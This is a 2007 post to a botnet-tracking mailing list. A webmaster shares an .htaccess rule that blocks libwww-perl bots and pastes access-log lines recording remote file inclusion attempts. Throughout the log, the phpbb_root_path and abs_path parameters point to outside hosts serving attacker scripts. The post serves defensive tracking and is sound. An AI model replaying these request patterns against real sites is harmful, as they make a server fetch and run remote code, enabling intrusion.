To report a botnet PRIVATELY please email: [EMAIL PROTECTED] ---------- Hi all; I Don't know if this will help anyone track these I can't really make too much sense of the log
I implimented a .htaccess Rule to 301 redirect of libwww-perl etc to google.com RewriteCond %{HTTP_USER_AGENT} ^libwww-perl.*$ [NC] RewriteRule \.*$ http://www.google.com [R,L] and so they came... Here are some examples from the current access.log file megan.netlogistics.com.au - - [08/Sep/2007:07:27:52 +1000] "GET /index.php? phpbb_root_path=http://www.kinkware.com/shop/pub/error.txt?? HTTP/1.1" 301 208 "-" "libwww-perl/5.808" (this is the only one I contacted and they sent back an email from [EMAIL PROTECTED] contents of which is... Hi, We will investigate this issue. In the mean time can you please provide us your IP address so we can block all traffic to your address so that you are not affected by this. Regards, Tarinder Singh, Systems Administrator Net Logistics Pty. Ltd. http://www.netlogistics.com.au ) 193.138.206.192 - - [08/Sep/2007:07:30:20 +1000] "GET /faq.php?phpbb_root_path=http://www.kinkware.com/shop/pub/error.txt?? HTTP/1.1" 301 208 "-" "libwww-perl/5.808" ... b2.d7.344a.static.theplanet.com - - [10/Sep/2007:18:16:11 +1000] "GET //phplivehelper/initiate.php?abs_path=http://usuarios.arnet.com.ar/lar ry123/safe.txt? HTTP/1.1" 301 208 "-" "libwww-perl/5.808" dime54.dizinc.com - - [10/Sep/2007:18:17:06 +1000] "GET //phplivehelper/initiate.php?abs_path=http://usuarios.arnet.com.ar/lar ry123/safe.txt? HTTP/1.1" 301 208 "-" "libwww-perl/5.808" ik80.ikexpress.com - - [10/Sep/2007:18:18:17 +1000] "GET //phplivehelper/initiate.php?abs_path=http://usuarios.arnet.com.ar/lar ry123/safe.txt? HTTP/1.1" 301 208 "-" "libwww-perl/5.805" mistral.lublin.pl - - [10/Sep/2007:18:33:15 +1000] "GET //phplivehelper/initiate.php?abs_path=http://usuarios.arnet.com.ar/lar ry123/safe.txt? HTTP/1.1" 301 208 "-" "libwww-perl/5.803" ... p1w33.geo.scd.hostingprod.com - - [10/Sep/2007:20:08:57 +1000] "GET /initiate.php?abs_path=http://ofskroz.somee.com/1337/perls/id.txt? HTTP/1.1" 301 208 "-" "libwww-perl/5.803" p1w33.geo.scd.hostingprod.com - - [10/Sep/2007:20:36:15 +1000] "GET /m32forum/%3Cwbr%20/%3Eshowtopic.php?threadid=62&time=/initiate.ph p?abs_path=http://ofskroz.somee.com/1337/perls/id.txt? HTTP/1.1" 301 208 "-" "libwww-perl/5.803" ... vps.websitedepot.com - - [20/Sep/2007:06:51:05 +1000] "GET /playlist.php?phpbb_root_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 301 208 "-" "libwww-perl/5.808" ... megan.netlogistics.com.au - - [20/Sep/2007:07:09:49 +1000] "GET /faq.php?phpbb_root_path=http://www.kinkware.com/shop/pub/error.txt?? HTTP/1.1" 301 208 "-" "libwww-perl/5.808" business-media.info - - [20/Sep/2007:07:14:32 +1000] "GET /faq.php?phpbb_root_path=http://sapikeren.net/yogya-carder/indonesia/T hemes/nebula/temp? HTTP/1.1" 301 208 "-" "libwww-perl/5.69" pass22.dizinc.com - - [20/Sep/2007:07:23:49 +1000] "GET /playlist.php?phpbb_root_path=http://71.102.93.10/WTS/bin/hak/idpitbul l.txt? HTTP/1.1" 301 208 "-" "libwww-perl/5.808" ns7.xenserve.com - - [20/Sep/2007:07:30:18 +1000] "GET /faq.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.tx t? HTTP/1.1" 301 208 "-" "libwww-perl/5.805" srv24.icx.pl - - [20/Sep/2007:07:41:28 +1000] "GET /playlist.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/sa fe.txt? HTTP/1.1" 301 208 "-" "libwww-perl/5.808" hostman.pl - - [20/Sep/2007:07:50:10 +1000] "GET /index.php?phpbb_root_path=http://71.102.93.10/WTS/bin/hak/idpitbull.t xt? HTTP/1.1" 301 208 "-" "libwww-perl/5.805" srv24.icx.pl - - [20/Sep/2007:08:03:39 +1000] "GET /index.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe. txt? HTTP/1.1" 301 208 "-" "libwww-perl/5.808" 202.60.80.10 - - [20/Sep/2007:08:19:27 +1000] "GET /song.php?phpbb_root_path=http://www.kinkware.com/shop/pub/error.txt?? HTTP/1.1" 301 208 "-" "libwww-perl/5.808" r118126.ppp.asahi-net.or.jp - - [20/Sep/2007:08:28:05 +1000] "GET /faq.php?phpbb_root_path=http://www.yesevent.org/tmp/echo3? HTTP/1.1" 301 208 "-" "libwww-perl/5.79" ... r118126.ppp.asahi-net.or.jp - - [20/Sep/2007:08:46:10 +1000] "GET /song.php?phpbb_root_path=http://www.yesevent.org/tmp/echo3? HTTP/1.1" 301 208 "-" "libwww-perl/5.79" hostman.pl - - [20/Sep/2007:08:48:32 +1000] "GET /faq.php?phpbb_root_path=http://71.102.93.10/WTS/bin/hak/idpitbull.txt ? HTTP/1.1" 301 208 "-" "libwww-perl/5.805" 69.57.190.194 - - [20/Sep/2007:09:01:52 +1000] "GET /index.php?phpbb_root_path=http://coyoteco.iespana.es/cmd.txt? HTTP/1.1" 301 208 "-" "libwww-perl/5.79" srv24.icx.pl - - [20/Sep/2007:09:12:33 +1000] "GET /song.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.t xt? HTTP/1.1" 301 208 "-" "libwww-perl/5.808" ----------------------------------------------- Dave Arrowsmith http://www.4tfingers.biz/ / _|_______ / .\__ __/ / /| |_| | /___ __|| |_| |_| PO Box 111, Bogangar, NSW, 2488, Australia. Friends may come and go, but enemies accumulate. _______________________________________________ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets